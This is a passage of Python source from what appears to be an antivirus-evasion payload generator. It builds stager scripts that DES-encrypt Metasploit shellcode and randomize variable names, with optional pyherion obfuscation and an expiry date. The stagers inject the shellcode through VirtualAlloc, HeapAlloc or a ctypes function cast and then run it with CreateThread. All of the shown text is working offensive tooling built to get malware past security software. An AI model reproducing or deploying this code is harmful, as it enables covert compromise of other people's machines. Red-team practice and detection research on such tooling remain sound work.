PayloadCode += RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n"
PayloadCode += (
ShellcodeVariableName
+ " = bytearray("
+ RandDESPayload
+ ".decrypt("
+ RandEncShellCodePayload
+ ").decode('string_escape'))\n"
)
PayloadCode += (
RandPtr
+ " = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len("
+ ShellcodeVariableName
+ ")),avlol.c_int(0x3000),avlol.c_int(0x40))\n"
)
PayloadCode += (
RandBuf
+ " = (avlol.c_char * len("
+ ShellcodeVariableName
+ ")).from_buffer("
+ ShellcodeVariableName
+ ")\n"
)
PayloadCode += (
"avlol.windll.kernel32.RtlMoveMemory(avlol.c_int("
+ RandPtr
+ "),"
+ RandBuf
+ ",avlol.c_int(len("
+ ShellcodeVariableName
+ ")))\n"
)
PayloadCode += (
RandHt
+ " = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int("
+ RandPtr
+ "),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n"
)
PayloadCode += "avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(" + RandHt + "),avlol.c_int(-1))"
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandDESKey = helpers.randomString()
RandDESPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode)
# Create Payload File
PayloadCode = "from Crypto.Cipher import DES\n"
PayloadCode += "import ctypes as avlol\n"
PayloadCode += "from datetime import datetime\n"
PayloadCode += "from datetime import date\n\n"
PayloadCode += RandToday + " = datetime.now()\n"
PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n'
PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n"
PayloadCode += "\t" + RandIV + " = '" + iv + "'\n"
PayloadCode += "\t" + RandDESKey + " = '" + DESKey + "'\n"
PayloadCode += "\t" + RandDESPayload + " = DES.new(" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n"
PayloadCode += "\t" + RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n"
PayloadCode += (
"\t"
+ ShellcodeVariableName
+ " = bytearray("
+ RandDESPayload
+ ".decrypt("
+ RandEncShellCodePayload
+ ").decode('string_escape'))\n"
)
PayloadCode += (
"\t"
+ RandPtr
+ " = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len("
+ ShellcodeVariableName
+ ")),avlol.c_int(0x3000),avlol.c_int(0x40))\n"
)
PayloadCode += (
"\t"
+ RandBuf
+ " = (avlol.c_char * len("
+ ShellcodeVariableName
+ ")).from_buffer("
+ ShellcodeVariableName
+ ")\n"
)
PayloadCode += (
"\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int("
+ RandPtr
+ "),"
+ RandBuf
+ ",avlol.c_int(len("
+ ShellcodeVariableName
+ ")))\n"
)
PayloadCode += (
"\t"
+ RandHt
+ " = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int("
+ RandPtr
+ "),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n"
)
PayloadCode += (
"\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(" + RandHt + "),avlol.c_int(-1))"
)
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
if self.required_options["inject_method"][0].lower() == "heap":
if self.required_options["expire_payload"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandDESKey = helpers.randomString()
RandDESPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
HeapVar = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode)
# Create Payload File
PayloadCode = "from Crypto.Cipher import DES\n"
PayloadCode += "import ctypes as avlol\n"
PayloadCode += RandIV + " = '" + iv + "'\n"
PayloadCode += RandDESKey + " = '" + DESKey + "'\n"
PayloadCode += RandDESPayload + " = DES.new(" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n"
PayloadCode += RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n"
PayloadCode += (
ShellcodeVariableName
+ " = bytearray("
+ RandDESPayload
+ ".decrypt("
+ RandEncShellCodePayload
+ ").decode('string_escape'))\n"
)
PayloadCode += (
HeapVar
+ " = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len("
+ ShellcodeVariableName
+ ") * 2),avlol.c_int(0))\n"
)
PayloadCode += (
RandPtr
+ " = avlol.windll.kernel32.HeapAlloc(avlol.c_int("
+ HeapVar
+ "),avlol.c_int(0x00000008),avlol.c_int(len( "
+ ShellcodeVariableName
+ ")))\n"
)
PayloadCode += (
RandBuf
+ " = (avlol.c_char * len("
+ ShellcodeVariableName
+ ")).from_buffer("
+ ShellcodeVariableName
+ ")\n"
)
PayloadCode += (
"avlol.windll.kernel32.RtlMoveMemory(avlol.c_int("
+ RandPtr
+ "),"
+ RandBuf
+ ",avlol.c_int(len("
+ ShellcodeVariableName
+ ")))\n"
)
PayloadCode += (
RandHt
+ " = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int("
+ RandPtr
+ "),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n"
)
PayloadCode += "avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(" + RandHt + "),avlol.c_int(-1))"
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandDESKey = helpers.randomString()
RandDESPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
HeapVar = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode)
# Create Payload File
PayloadCode = "from Crypto.Cipher import DES\n"
PayloadCode += "import ctypes as avlol\n"
PayloadCode += "from datetime import datetime\n"
PayloadCode += "from datetime import date\n\n"
PayloadCode += RandToday + " = datetime.now()\n"
PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n'
PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n"
PayloadCode += "\t" + RandIV + " = '" + iv + "'\n"
PayloadCode += "\t" + RandDESKey + " = '" + DESKey + "'\n"
PayloadCode += "\t" + RandDESPayload + " = DES.new(" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n"
PayloadCode += "\t" + RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n"
PayloadCode += (
"\t"
+ ShellcodeVariableName
+ " = bytearray("
+ RandDESPayload
+ ".decrypt("
+ RandEncShellCodePayload
+ ").decode('string_escape'))\n"
)
PayloadCode += (
"\t"
+ HeapVar
+ " = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len("
+ ShellcodeVariableName
+ ") * 2),avlol.c_int(0))\n"
)
PayloadCode += (
"\t"
+ RandPtr
+ " = avlol.windll.kernel32.HeapAlloc(avlol.c_int("
+ HeapVar
+ "),avlol.c_int(0x00000008),avlol.c_int(len( "
+ ShellcodeVariableName
+ ")))\n"
)
PayloadCode += (
"\t"
+ RandBuf
+ " = (avlol.c_char * len("
+ ShellcodeVariableName
+ ")).from_buffer("
+ ShellcodeVariableName
+ ")\n"
)
PayloadCode += (
"\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int("
+ RandPtr
+ "),"
+ RandBuf
+ ",avlol.c_int(len("
+ ShellcodeVariableName
+ ")))\n"
)
PayloadCode += (
"\t"
+ RandHt
+ " = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int("
+ RandPtr
+ "),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n"
)
PayloadCode += (
"\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(" + RandHt + "),avlol.c_int(-1))"
)
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
if self.required_options["expire_payload"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandDESKey = helpers.randomString()
RandDESPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode)
# Create Payload File
PayloadCode = "from Crypto.Cipher import DES\n"
PayloadCode += "from ctypes import *\n"
PayloadCode += RandIV + " = '" + iv + "'\n"
PayloadCode += RandDESKey + " = '" + DESKey + "'\n"
PayloadCode += RandDESPayload + " = DES.new(" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n"
PayloadCode += RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n"
PayloadCode += (
ShellcodeVariableName
+ " = "
+ RandDESPayload
+ ".decrypt("
+ RandEncShellCodePayload
+ ").decode('string_escape')\n"
)
PayloadCode += (
RandMemoryShell
+ " = create_string_buffer("
+ ShellcodeVariableName
+ ", len("
+ ShellcodeVariableName
+ "))\n"
)
PayloadCode += RandShellcode + " = cast(" + RandMemoryShell + ", CFUNCTYPE(c_void_p))\n"
PayloadCode += RandShellcode + "()"
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandDESKey = helpers.randomString()
RandDESPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode)
# Create Payload File
PayloadCode = "from Crypto.Cipher import DES\n"
PayloadCode += "from ctypes import *\n"
PayloadCode += "from datetime import datetime\n"
PayloadCode += "from datetime import date\n\n"
PayloadCode += RandToday + " = datetime.now()\n"
PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n'
PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n"
PayloadCode += "\t" + RandIV + " = '" + iv + "'\n"
PayloadCode += "\t" + RandDESKey + " = '" + DESKey + "'\n"
PayloadCode += "\t" + RandDESPayload + " = DES.new(" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n"
PayloadCode += "\t" + RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n"
PayloadCode += (
"\t"
+ ShellcodeVariableName
+ " = "
+ RandDESPayload
+ ".decrypt("
+ RandEncShellCodePayload
+ ").decode('string_escape')\n"
)
PayloadCode += (
"\t"
+ RandMemoryShell
+ " = create_string_buffer("
+ ShellcodeVariableName
+ ", len("
+ ShellcodeVariableName
+ "))\n"
)
PayloadCode += "\t" + RandShellcode + " = cast(" + RandMemoryShell + ", CFUNCTYPE(c_void_p))\n"
PayloadCode += "\t" + RandShellcode + "()"
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode